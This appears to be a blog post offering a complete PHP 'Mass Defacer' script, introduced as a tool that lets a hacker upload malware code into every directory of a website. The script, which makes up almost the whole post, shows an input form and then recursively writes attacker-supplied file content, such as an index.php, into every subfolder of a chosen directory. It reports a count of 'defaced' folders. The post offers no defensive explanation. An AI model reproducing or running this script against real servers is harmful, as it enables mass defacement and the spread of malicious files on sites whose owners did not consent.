Malicious code maker

By RobertVirus Removal

With this tool the hacker can upload malware code to the websites dir (recursively!), with whatever name what he wants.

<?php

error_reporting (NULL);
set_time_limit (NULL);

$ds = "/";
if (preg_match ("/WIN/", PHP_OS))
    $ds = "\\";

$dir = getcwd ();
$count = 0;

echo '
<title>Mass Defacer by YunusIncredibl</title>
<style>.my{border: solid 1px red}</style>
<form method="POST">
Directory : <input class="my" size=40 type="text" name="basedir" value='.$dir.'><br><br>
Name : <input class="my" size=40 type="text" name="name" value="index.php"><br><br>
Your Index : <br><textarea style="width: 671px; height: 295px;" class="my" name="index"></textarea><br>
<input type="submit" value="Start" name="go">
</form>';

if (@$_POST['go'])
{
    echo "<textarea style='width: 875px; height: 255px;' class='my'>";
    mass ($_POST['basedir'], $_POST['name'], $_POST['index']);
    echo "</textarea><br>Defaced : $count Folder :D";
}

function mass ($dir, $name, $index)
{
    global $ds;
    global $count;

    foreach (scandir2 ($dir) as $x)
    {
        if (is_dir ($dir.$ds.$x))
        {
            if (file_put_contents ($dir.$ds.$x.$ds.$name, $index))
            {
                echo $dir.$ds.$x.$ds.$name."\n";
                $count++;
            }
            mass ($dir.$ds.$x, $name, $index);
        }
    }
}

function scandir2 ($dir)
{
    $files = array ();
    if (file_exists ($dir))
    {
        $d = opendir ($dir) or die (NULL);
        while ($file = readdir ($d))
        {
            if ($file != "." && $file != "..")
            {
                array_push ($files, $file);
            }
        }
    }
    return $files;
}

?>

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.